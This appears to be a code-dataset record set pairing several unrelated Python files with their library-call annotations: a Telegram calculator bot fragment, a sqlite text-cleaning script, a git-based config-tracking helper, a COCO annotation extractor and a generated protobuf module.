        dispatcher.add_handler(CommandHandler("help", self.help_command))
        dispatcher.add_handler(CommandHandler("new", self.new_command))
        # on non command i.e message - echo the message on Telegram
        dispatcher.add_handler(InlineQueryHandler(self.inlinequery))
        dispatcher.add_handler(CallbackQueryHandler(self.callbackquery))
        # Start the Bot
        updater.start_polling()
        # Block until the user presses Ctrl-C or the process receives SIGINT,
        # SIGTERM or SIGABRT. This should be used most of the time, since
        # start_polling() is non-blocking and will stop the bot gracefully.
        updater.idle()
|
[
"logging.error",
"uuid.uuid4",
"logging.debug",
"telegram.ext.CallbackQueryHandler",
"telegram.ext.InlineQueryHandler",
"telegram.InputTextMessageContent",
"collections.defaultdict",
"logging.info",
"telegram.ext.Updater",
"telegram.inline.inlinekeyboardbutton.InlineKeyboardButton",
"telegram.ext.CommandHandler"
] |
[((926, 943), 'collections.defaultdict', 'defaultdict', (['Lock'], {}), '(Lock)\n', (937, 943), False, 'from collections import defaultdict\n'), ((6224, 6243), 'telegram.ext.Updater', 'Updater', (['self.token'], {}), '(self.token)\n', (6231, 6243), False, 'from telegram.ext import CallbackContext, CallbackQueryHandler, CommandHandler, InlineQueryHandler, Updater\n'), ((6291, 6344), 'logging.info', 'logging.info', (['"""Starting updater for bot: %s"""', 'me_info'], {}), "('Starting updater for bot: %s', me_info)\n", (6303, 6344), False, 'import logging\n'), ((6521, 6556), 'telegram.ext.CommandHandler', 'CommandHandler', (['"""start"""', 'self.start'], {}), "('start', self.start)\n", (6535, 6556), False, 'from telegram.ext import CallbackContext, CallbackQueryHandler, CommandHandler, InlineQueryHandler, Updater\n'), ((6589, 6630), 'telegram.ext.CommandHandler', 'CommandHandler', (['"""help"""', 'self.help_command'], {}), "('help', self.help_command)\n", (6603, 6630), False, 'from telegram.ext import CallbackContext, CallbackQueryHandler, CommandHandler, InlineQueryHandler, Updater\n'), ((6663, 6702), 'telegram.ext.CommandHandler', 'CommandHandler', (['"""new"""', 'self.new_command'], {}), "('new', self.new_command)\n", (6677, 6702), False, 'from telegram.ext import CallbackContext, CallbackQueryHandler, CommandHandler, InlineQueryHandler, Updater\n'), ((6804, 6840), 'telegram.ext.InlineQueryHandler', 'InlineQueryHandler', (['self.inlinequery'], {}), '(self.inlinequery)\n', (6822, 6840), False, 'from telegram.ext import CallbackContext, CallbackQueryHandler, CommandHandler, InlineQueryHandler, Updater\n'), ((6873, 6913), 'telegram.ext.CallbackQueryHandler', 'CallbackQueryHandler', (['self.callbackquery'], {}), '(self.callbackquery)\n', (6893, 6913), False, 'from telegram.ext import CallbackContext, CallbackQueryHandler, CommandHandler, InlineQueryHandler, Updater\n'), ((3031, 3101), 'logging.debug', 'logging.debug', (['"""failed answering callback query with empty 
expression"""'], {}), "('failed answering callback query with empty expression')\n", (3044, 3101), False, 'import logging\n'), ((4644, 4705), 'logging.error', 'logging.error', (['"""failed editing callback message: %s"""', 'message'], {}), "('failed editing callback message: %s', message)\n", (4657, 4705), False, 'import logging\n'), ((5003, 5047), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""7"""'], {'callback_data': '"""7"""'}), "('7', callback_data='7')\n", (5023, 5047), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5065, 5109), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""8"""'], {'callback_data': '"""8"""'}), "('8', callback_data='8')\n", (5085, 5109), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5127, 5171), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""9"""'], {'callback_data': '"""9"""'}), "('9', callback_data='9')\n", (5147, 5171), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5189, 5233), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""*"""'], {'callback_data': '"""*"""'}), "('*', callback_data='*')\n", (5209, 5233), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5251, 5295), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""/"""'], {'callback_data': '"""/"""'}), "('/', callback_data='/')\n", (5271, 5295), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5341, 5385), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""4"""'], {'callback_data': '"""4"""'}), "('4', callback_data='4')\n", (5361, 5385), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5403, 5447), 
'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""5"""'], {'callback_data': '"""5"""'}), "('5', callback_data='5')\n", (5423, 5447), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5465, 5509), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""6"""'], {'callback_data': '"""6"""'}), "('6', callback_data='6')\n", (5485, 5509), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5527, 5571), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""+"""'], {'callback_data': '"""+"""'}), "('+', callback_data='+')\n", (5547, 5571), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5589, 5633), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""-"""'], {'callback_data': '"""-"""'}), "('-', callback_data='-')\n", (5609, 5633), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5679, 5723), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""1"""'], {'callback_data': '"""1"""'}), "('1', callback_data='1')\n", (5699, 5723), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5741, 5785), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""2"""'], {'callback_data': '"""2"""'}), "('2', callback_data='2')\n", (5761, 5785), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5803, 5847), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""3"""'], {'callback_data': '"""3"""'}), "('3', callback_data='3')\n", (5823, 5847), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5865, 5909), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', 
(['"""="""'], {'callback_data': '"""="""'}), "('=', callback_data='=')\n", (5885, 5909), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5927, 5971), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""c"""'], {'callback_data': '"""c"""'}), "('c', callback_data='c')\n", (5947, 5971), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((6018, 6062), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""0"""'], {'callback_data': '"""0"""'}), "('0', callback_data='0')\n", (6038, 6062), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((6080, 6124), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""."""'], {'callback_data': '"""."""'}), "('.', callback_data='.')\n", (6100, 6124), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((2228, 2327), 'telegram.InputTextMessageContent', 'InputTextMessageContent', (['"""__Start typing number to calculate__"""'], {'parse_mode': 'ParseMode.MARKDOWN'}), "('__Start typing number to calculate__', parse_mode=\n ParseMode.MARKDOWN)\n", (2251, 2327), False, 'from telegram import InlineKeyboardMarkup, InlineQueryResultArticle, InputTextMessageContent, Update\n'), ((4241, 4302), 'logging.error', 'logging.error', (['"""failed editing callback message: %s"""', 'message'], {}), "('failed editing callback message: %s', message)\n", (4254, 4302), False, 'import logging\n'), ((2125, 2132), 'uuid.uuid4', 'uuid4', ([], {}), '()\n', (2130, 2132), False, 'from uuid import uuid4\n')]
|
#! /usr/bin/env python3
# proc6a.py 2020-11-18 2020-11-19 1.1
# Bard-poster processing: normalise whitespace in every text column of the
# sqlite3 `data` table (strip, and replace newlines/CRs/tabs with spaces).
# Archivist: M.Kolodin

import sqlite3

DB_FILE = 'apx.db'

UPDATE_SQL = """update data set
        wd = ?,
        year = ?,
        date = ?,
        datesql = ?,
        time = ?,
        city = ?,
        place = ?,
        what = ?,
        desc = ?,
        source = ?,
        status = ?,
        shown = ?,
        uuid = ?
        where id = ?
        """

connection = sqlite3.connect(DB_FILE)
reader = connection.cursor()
writer = connection.cursor()

processed = 0
errors = 0

for record in reader.execute('select * from data order by datesql asc, time asc'):
    processed += 1
    # Progress indicator: one digit per processed row.
    print(processed % 10, end="", flush=True)
    fields = list(record)
    row_id = fields[0]
    cleaned = [row_id]
    # Normalise every text column (everything after the id).
    for value in fields[1:]:
        value = value.strip()
        for whitespace in ('\n', '\r', '\t'):
            value = value.replace(whitespace, ' ')
        cleaned.append(value)
    # Parameters are the cleaned columns followed by the row id.
    writer.execute(UPDATE_SQL, cleaned[1:] + [row_id])

connection.commit()
connection.close()
print(f"\nобработано событий: {processed}, ошибок: {errors}\n")
|
[
"sqlite3.connect"
] |
[((204, 223), 'sqlite3.connect', 'sqlite3.connect', (['db'], {}), '(db)\n', (219, 223), False, 'import sqlite3\n')]
|
#!/usr/bin/env python3
import os
from subprocess import Popen, PIPE
import sys
def gitStoreLink(git_store, List, verbose=False):
    """Hard-link each file in *List* into the git store directory tree.

    Each path ``f`` is mirrored at ``git_store + f``; missing intermediate
    directories are created.  Existing links are left untouched.

    :param git_store: root directory of the git store
    :param List: iterable of file paths to mirror into the store
    :param verbose: print each mkdir/link action when True
    :return: True
    """
    if not os.path.isdir(git_store):
        if verbose:
            print('mkdir ' + str(git_store))
        os.mkdir(git_store, 0o755)
    for f in List:
        gfile = git_store + f
        gdir = os.path.dirname(gfile)
        if not os.path.isdir(gdir):
            if verbose:
                print('mkdir ' + str(gdir))
            # makedirs handles arbitrarily deep paths; the previous
            # os.mkdir raised FileNotFoundError when more than one
            # intermediate directory was missing.
            os.makedirs(gdir, 0o755)
        if not os.path.isfile(gfile):
            if verbose:
                print('link ' + str(gfile))
            os.link(f, gfile)
    return True
def gitStoreInit(git_store, verbose=False):
    """Ensure *git_store* exists and contains an initialised git repository.

    Creates the directory (mode 0o755) when missing and runs ``git init``
    when no ``.git`` subdirectory is present yet.

    :return: True
    """
    if not os.path.isdir(git_store):
        if verbose:
            print('mkdir ' + str(git_store))
        os.mkdir(git_store, 0o755)
    git_dir = git_store + '/.git'
    if not os.path.isdir(git_dir):
        if verbose:
            print('git init ' + str(git_store))
        cmd = 'git init ' + str(git_store)
        proc = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
        if verbose:
            for raw_line in proc.stdout.readlines():
                print(raw_line.decode('utf-8').strip('\n'))
    return True
def gitStoreAdd(git_store, f, verbose=False):
    """Stage the stored copy of file *f* with ``git add``.

    Changes the working directory to *git_store* first.  Returns an error
    string when the store directory or the source file is unusable,
    otherwise the (stdout, stderr, exit_code) triple of the git process.
    """
    try:
        os.chdir(git_store)
    except FileNotFoundError as e:
        if verbose:
            print('FileNotFoundError: ' + str(e))
        return 'FileNotFoundError: ' + str(e)
    # Validate the source file before invoking git.
    if not os.access(f, os.F_OK):
        if verbose:
            print('Not Found: ' + str(f))
        return 'Not Found: ' + str(f)
    if not os.access(f, os.R_OK):
        if verbose:
            print('No Access: ' + str(f))
        return 'No Access: ' + str(f)
    cmd = 'git add ' + git_store + f
    if verbose:
        print('git add ' + git_store + f)
    proc = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
    stdout, stderr = proc.communicate()
    exit_code = proc.wait()
    if verbose:
        print(stdout.decode('utf-8'))
        print(stderr.decode('utf-8'))
        print(str(exit_code))
    return stdout, stderr, exit_code
def gitStoreDel(git_store, f, verbose=False):
    # Remove file *f* from the git store: force `git rm` on the stored copy,
    # delete any leftover hard link on disk, then commit the deletion.
    # Always returns True.
    # NOTE(review): os.chdir raises if git_store is missing (no try/except,
    # unlike gitStoreAdd/gitStoreStatus) -- presumably intentional; confirm.
    os.chdir(git_store)
    if verbose: print('git rm ' + git_store + f)
    cmd = 'git rm -f ' + git_store + f
    proc = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
    # NOTE(review): stdout is only drained in verbose mode and the process
    # is never wait()ed, so git rm may still be running when the
    # os.path.exists check below executes -- confirm this race is acceptable.
    if verbose:
        for line in proc.stdout.readlines():
            print(line.decode('utf-8').strip('\n'))
    if os.path.exists(git_store + f):
        if verbose: print('remove ' + git_store + f)
        os.remove(git_store + f)
    # The commit is always verbose, regardless of this function's flag.
    git_commit = gitStoreCommit(git_store, f, verbose=True)
    return True
def gitStoreCommit(git_store, f, verbose=False):
    """Commit the stored copy of *f* with a fixed "sentinel" message.

    Changes the working directory to *git_store*, then runs ``git commit``
    restricted to that one path.

    :return: (stdout, stderr, exit_code) of the git process
    """
    os.chdir(git_store)
    if verbose:
        print('git commit me ' + git_store + f)
    commit_message = '"sentinel ' + str(f) + '"'
    proc = Popen(['git', 'commit', '-m', commit_message, git_store + f],
                 stdout=PIPE, stderr=PIPE)
    stdout, stderr = proc.communicate()
    exit_code = proc.wait()
    if verbose:
        print(stdout.decode('utf-8'))
        print(stderr.decode('utf-8'))
        print(str(exit_code))
    return stdout, stderr, exit_code
def gitStoreStatus(git_store, verbose=False):
    """Run ``git status`` inside the store directory.

    :return: (stdout, stderr, exit_code) of the git process, or an error
        string when *git_store* does not exist.
    """
    try:
        os.chdir(git_store)
    except FileNotFoundError as e:
        if verbose:
            print('FileNotFoundError: ' + str(e))
        return 'FileNotFoundError: ' + str(e)
    proc = Popen(['git', 'status'], stdout=PIPE, stderr=PIPE)
    stdout, stderr = proc.communicate()
    exit_code = proc.wait()
    if verbose:
        print(stdout.decode('utf-8'))
        print(stderr.decode('utf-8'))
        print(str(exit_code))
    return stdout, stderr, exit_code
def gitStoreLsFiles(git_store, verbose=False):
    """Run ``git ls-files`` inside the store directory.

    :return: (stdout, stderr, exit_code) of the git process, or an error
        string when *git_store* does not exist.
    """
    try:
        os.chdir(git_store)
    except FileNotFoundError as e:
        if verbose:
            print('FileNotFoundError: ' + str(e))
        return 'FileNotFoundError: ' + str(e)
    proc = Popen(['git', 'ls-files'], stdout=PIPE, stderr=PIPE)
    stdout, stderr = proc.communicate()
    exit_code = proc.wait()
    if verbose:
        print(stdout.decode('utf-8'))
        print(stderr.decode('utf-8'))
        print(str(exit_code))
    return stdout, stderr, exit_code
def gitStoreLog(git_store, verbose=False):
    """Return the ``git log`` output lines for *git_store*.

    Returns:
        The list of raw stdout lines (bytes) from ``git log``, or an
        error string of the form 'FileNotFoundError: ...' when the store
        directory does not exist.
    """
    try:
        os.chdir(git_store)
    except FileNotFoundError as e:
        if verbose: print('FileNotFoundError: ' + str(e))
        return 'FileNotFoundError: ' + str(e)
    cmd = 'git log'
    proc = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
    # BUG FIX: read stdout exactly once.  The old code consumed the stream
    # while verbose-printing and then returned a second readlines() call,
    # which was always empty in verbose mode.
    lines = proc.stdout.readlines()
    if verbose:
        for line in lines:
            print(line.decode('utf-8').strip('\n'))
    return lines
def gitStoreClearHistory(git_store, verbose=False):
    """Squash the git store's history onto a fresh master branch.

    Re-creates master as an orphan branch holding only the current tree,
    discarding all previous commits.  Returns True.

    Raises:
        FileNotFoundError: if *git_store* does not exist (from os.chdir).
    """
    os.chdir(git_store)
    def _run(cmd):
        # Launch one git command and optionally echo its stdout.
        argv = cmd if isinstance(cmd, list) else cmd.split()
        proc = Popen(argv, stdout=PIPE, stderr=PIPE)
        if verbose:
            for raw in proc.stdout.readlines():
                print(raw.decode('utf-8').strip('\n'))
    _run('git checkout --orphan temp_branch')
    _run('git add -A')
    # NOTE: the message is passed as a single '-am ...' argument, exactly
    # as in the historical invocation.
    _run(['git', 'commit', '-am "sentinel re-commit"'])
    _run('git branch -D master')
    _run('git branch -m master')
    return True
#import mimetypes
#mime = mimetypes.guess_type(file)
def fileType(_file):
    """Classify *_file* as 'text' or 'binary' by probing a UTF-8 decode.

    Reads the first few characters in text mode; a UnicodeDecodeError
    means the content is not valid UTF-8 and the file is called binary.
    """
    try:
        with open(_file, 'r', encoding='utf-8') as handle:
            handle.read(4)
    except UnicodeDecodeError:
        return 'binary'
    return 'text'
def gitStoreDiff(git_store, f=None, verbose=False):
    """Run ``git diff`` for the store, optionally limited to file *f*.

    Returns (stdout, stderr, exit_code), or an error string of the form
    'FileNotFoundError: ...' when the store directory does not exist.
    """
    try:
        os.chdir(git_store)
    except FileNotFoundError as e:
        if verbose:
            print('FileNotFoundError: ' + str(e))
        return 'FileNotFoundError: ' + str(e)
    target = '' if f is None else f
    proc = Popen(('git diff ' + target).split(), stdout=PIPE, stderr=PIPE)
    out, err = proc.communicate()
    status = proc.wait()
    if verbose:
        print(out.decode('utf-8'))
        print(err.decode('utf-8'))
        print(str(status))
    return out, err, status
if __name__ == '__main__':
    # Manual CLI driver for the git-store helpers.  First argument selects
    # the operation; some operations take a file path as second argument.
    git_store = '/opt/sentinel/db/git/dir2'
    L = [ '/etc/hosts', '/etc/ssh/sshd_config' ]
    git_init = gitStoreInit(git_store)
    git_link = gitStoreLink(git_store, L)

    def _require_readable(path):
        """Exit with status 1 unless *path* exists and is readable."""
        if not os.access(path, os.F_OK):
            print('Not Found: ' + str(path))
            sys.exit(1)
        elif not os.access(path, os.R_OK):
            print('No Access: ' + str(path))
            sys.exit(1)

    if sys.argv[1:]:
        if sys.argv[1] == 'git-status':
            git_status = gitStoreStatus(git_store, verbose=True)
        if sys.argv[1] == 'git-files':
            git_files = gitStoreLsFiles(git_store, verbose=True)
        if sys.argv[1] == 'git-log':
            git_log = gitStoreLog(git_store, verbose=True)
        if sys.argv[1] == 'git-add':
            _file = sys.argv[2]
            # Refactor: the duplicated F_OK/R_OK check now lives in
            # _require_readable (same messages, same exit codes).
            _require_readable(_file)
            git_link = gitStoreLink(git_store, [_file], verbose=True)
            git_add = gitStoreAdd(git_store, _file, verbose=True)
            git_commit = gitStoreCommit(git_store, _file, verbose=True)
        if sys.argv[1] == 'git-del':
            _file = sys.argv[2]
            git_del = gitStoreDel(git_store, _file, verbose=True)
        if sys.argv[1] == 'git-commit':
            _file = sys.argv[2]
            _require_readable(_file)
            git_commit = gitStoreCommit(git_store, _file, verbose=True)
        if sys.argv[1] == 'git-clear-history':
            git_clear_hist = gitStoreClearHistory(git_store, verbose=True)
        if sys.argv[1] == 'git-diff':
            # The file argument is optional for a diff.
            try: _file = sys.argv[2]
            except IndexError: _file = None
            git_diff = gitStoreDiff(git_store, _file, verbose=True)
        if sys.argv[1] == 'git-init':
            git_init = gitStoreInit(git_store)
        if sys.argv[1] == 'file-type':
            _file = sys.argv[2]
            file_type = fileType(_file)
            print(file_type)
# git + tegridy
|
[
"os.mkdir",
"subprocess.Popen",
"os.remove",
"os.path.isdir",
"os.path.dirname",
"os.path.exists",
"os.path.isfile",
"os.link",
"os.access",
"os.chdir",
"sys.exit"
] |
[((2063, 2082), 'os.chdir', 'os.chdir', (['git_store'], {}), '(git_store)\n', (2071, 2082), False, 'import os\n'), ((2348, 2377), 'os.path.exists', 'os.path.exists', (['(git_store + f)'], {}), '(git_store + f)\n', (2362, 2377), False, 'import os\n'), ((2602, 2621), 'os.chdir', 'os.chdir', (['git_store'], {}), '(git_store)\n', (2610, 2621), False, 'import os\n'), ((2922, 2958), 'subprocess.Popen', 'Popen', (['cmd'], {'stdout': 'PIPE', 'stderr': 'PIPE'}), '(cmd, stdout=PIPE, stderr=PIPE)\n', (2927, 2958), False, 'from subprocess import Popen, PIPE\n'), ((4759, 4778), 'os.chdir', 'os.chdir', (['git_store'], {}), '(git_store)\n', (4767, 4778), False, 'import os\n'), ((5254, 5290), 'subprocess.Popen', 'Popen', (['cmd'], {'stdout': 'PIPE', 'stderr': 'PIPE'}), '(cmd, stdout=PIPE, stderr=PIPE)\n', (5259, 5290), False, 'from subprocess import Popen, PIPE\n'), ((144, 168), 'os.path.isdir', 'os.path.isdir', (['git_store'], {}), '(git_store)\n', (157, 168), False, 'import os\n'), ((231, 255), 'os.mkdir', 'os.mkdir', (['git_store', '(493)'], {}), '(git_store, 493)\n', (239, 255), False, 'import os\n'), ((681, 705), 'os.path.isdir', 'os.path.isdir', (['git_store'], {}), '(git_store)\n', (694, 705), False, 'import os\n'), ((768, 792), 'os.mkdir', 'os.mkdir', (['git_store', '(493)'], {}), '(git_store, 493)\n', (776, 792), False, 'import os\n'), ((807, 841), 'os.path.isdir', 'os.path.isdir', (["(git_store + '/.git')"], {}), "(git_store + '/.git')\n", (820, 841), False, 'import os\n'), ((1232, 1251), 'os.chdir', 'os.chdir', (['git_store'], {}), '(git_store)\n', (1240, 1251), False, 'import os\n'), ((1403, 1424), 'os.access', 'os.access', (['f', 'os.F_OK'], {}), '(f, os.F_OK)\n', (1412, 1424), False, 'import os\n'), ((2440, 2464), 'os.remove', 'os.remove', (['(git_store + f)'], {}), '(git_store + f)\n', (2449, 2464), False, 'import os\n'), ((3252, 3271), 'os.chdir', 'os.chdir', (['git_store'], {}), '(git_store)\n', (3260, 3271), False, 'import os\n'), ((3786, 3805), 'os.chdir', 
'os.chdir', (['git_store'], {}), '(git_store)\n', (3794, 3805), False, 'import os\n'), ((4318, 4337), 'os.chdir', 'os.chdir', (['git_store'], {}), '(git_store)\n', (4326, 4337), False, 'import os\n'), ((6353, 6372), 'os.chdir', 'os.chdir', (['git_store'], {}), '(git_store)\n', (6361, 6372), False, 'import os\n'), ((502, 523), 'os.path.isfile', 'os.path.isfile', (['gfile'], {}), '(gfile)\n', (516, 523), False, 'import os\n'), ((589, 606), 'os.link', 'os.link', (['f', 'gfile'], {}), '(f, gfile)\n', (596, 606), False, 'import os\n'), ((1527, 1548), 'os.access', 'os.access', (['f', 'os.R_OK'], {}), '(f, os.R_OK)\n', (1536, 1548), False, 'import os\n'), ((339, 361), 'os.path.dirname', 'os.path.dirname', (['gfile'], {}), '(gfile)\n', (354, 361), False, 'import os\n'), ((455, 477), 'os.path.dirname', 'os.path.dirname', (['gfile'], {}), '(gfile)\n', (470, 477), False, 'import os\n'), ((7601, 7626), 'os.access', 'os.access', (['_file', 'os.F_OK'], {}), '(_file, os.F_OK)\n', (7610, 7626), False, 'import os\n'), ((7694, 7705), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (7702, 7705), False, 'import sys\n'), ((8271, 8296), 'os.access', 'os.access', (['_file', 'os.F_OK'], {}), '(_file, os.F_OK)\n', (8280, 8296), False, 'import os\n'), ((8364, 8375), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (8372, 8375), False, 'import sys\n'), ((7727, 7752), 'os.access', 'os.access', (['_file', 'os.R_OK'], {}), '(_file, os.R_OK)\n', (7736, 7752), False, 'import os\n'), ((7820, 7831), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (7828, 7831), False, 'import sys\n'), ((8397, 8422), 'os.access', 'os.access', (['_file', 'os.R_OK'], {}), '(_file, os.R_OK)\n', (8406, 8422), False, 'import os\n'), ((8490, 8501), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (8498, 8501), False, 'import sys\n'), ((409, 431), 'os.path.dirname', 'os.path.dirname', (['gfile'], {}), '(gfile)\n', (424, 431), False, 'import os\n')]
|
#!/bin/python
## Extract the annotations of a single COCO val2014 image (FILE_NAME)
## from the full instances file into a standalone JSON document that
## mirrors the original schema.
import json
import shutil
import os
from pprint import pprint
PATH = "/disk/no_backup/mlprak4/adverserial-object-segmentation/data/"
ANNOTATIONS = "annotations/instances_val2014.json"
FILE_NAME = "COCO_val2014_000000083277.jpg"
# Load the full annotation file.
with open(PATH + ANNOTATIONS) as fh:
    data = json.load(fh)
# Start from an empty document and copy the global metadata over.
extract = json.loads("{}")
extract["info"] = data["info"]
extract["licenses"] = data["licenses"]
# Keep only the image record(s) whose file name matches FILE_NAME.
extract["images"] = [img for img in data["images"] if img["file_name"] == FILE_NAME]
image_ids = [img["id"] for img in extract["images"]]
# Keep only the annotations that reference those images.
extract["annotations"] = [ann for ann in data["annotations"] if ann["image_id"] in image_ids]
# Categories are copied wholesale.
extract["categories"] = data["categories"]
# Write the extracted subset next to the script.
with open("instances_extract.json", "w") as outfile:
    json.dump(extract, outfile, indent=4)
print("Annotations for " + str(len(extract["images"])) + " images extracted")
|
[
"json.dump",
"json.load",
"json.loads"
] |
[((467, 483), 'json.loads', 'json.loads', (['"""{}"""'], {}), "('{}')\n", (477, 483), False, 'import json\n'), ((413, 425), 'json.load', 'json.load', (['f'], {}), '(f)\n', (422, 425), False, 'import json\n'), ((1127, 1164), 'json.dump', 'json.dump', (['extract', 'outfile'], {'indent': '(4)'}), '(extract, outfile, indent=4)\n', (1136, 1164), False, 'import json\n')]
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: get_app_deploy_instance.proto
import sys
# Py2/Py3 shim: the serialized descriptor below is stored as a latin-1
# text literal; on Python 3 it must be re-encoded back to bytes.
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
# File-level descriptor; serialized_pb is the wire-format
# FileDescriptorProto for package "business".
DESCRIPTOR = _descriptor.FileDescriptor(
  name='get_app_deploy_instance.proto',
  package='business',
  syntax='proto3',
  serialized_options=None,
  serialized_pb=_b('\n\x1dget_app_deploy_instance.proto\x12\x08\x62usiness\"-\n\x1bGetAppDeployInstanceRequest\x12\x0e\n\x06\x61ppIds\x18\x01 \x01(\t\"\xe4\x01\n\x1cGetAppDeployInstanceResponse\x12\x39\n\x04list\x18\x01 \x03(\x0b\x32+.business.GetAppDeployInstanceResponse.List\x1a\x88\x01\n\x04List\x12\x12\n\ninstanceId\x18\x01 \x01(\t\x12\x11\n\tpackageId\x18\x02 \x01(\t\x12\x11\n\tversionId\x18\x03 \x01(\t\x12\x10\n\x08\x64\x65viceId\x18\x04 \x01(\t\x12\x10\n\x08\x64\x65viceIp\x18\x05 \x01(\t\x12\x13\n\x0binstallPath\x18\x06 \x01(\t\x12\r\n\x05\x61ppId\x18\x07 \x01(\t\"\x8d\x01\n#GetAppDeployInstanceResponseWrapper\x12\x0c\n\x04\x63ode\x18\x01 \x01(\x05\x12\x13\n\x0b\x63odeExplain\x18\x02 \x01(\t\x12\r\n\x05\x65rror\x18\x03 \x01(\t\x12\x34\n\x04\x64\x61ta\x18\x04 \x01(\x0b\x32&.business.GetAppDeployInstanceResponseb\x06proto3')
)
# Descriptor for message business.GetAppDeployInstanceRequest
# (single string field: appIds).
_GETAPPDEPLOYINSTANCEREQUEST = _descriptor.Descriptor(
  name='GetAppDeployInstanceRequest',
  full_name='business.GetAppDeployInstanceRequest',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='appIds', full_name='business.GetAppDeployInstanceRequest.appIds', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=43,
  serialized_end=88,
)
# Descriptor for nested message
# business.GetAppDeployInstanceResponse.List (one deployed instance).
_GETAPPDEPLOYINSTANCERESPONSE_LIST = _descriptor.Descriptor(
  name='List',
  full_name='business.GetAppDeployInstanceResponse.List',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='instanceId', full_name='business.GetAppDeployInstanceResponse.List.instanceId', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='packageId', full_name='business.GetAppDeployInstanceResponse.List.packageId', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='versionId', full_name='business.GetAppDeployInstanceResponse.List.versionId', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='deviceId', full_name='business.GetAppDeployInstanceResponse.List.deviceId', index=3,
      number=4, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
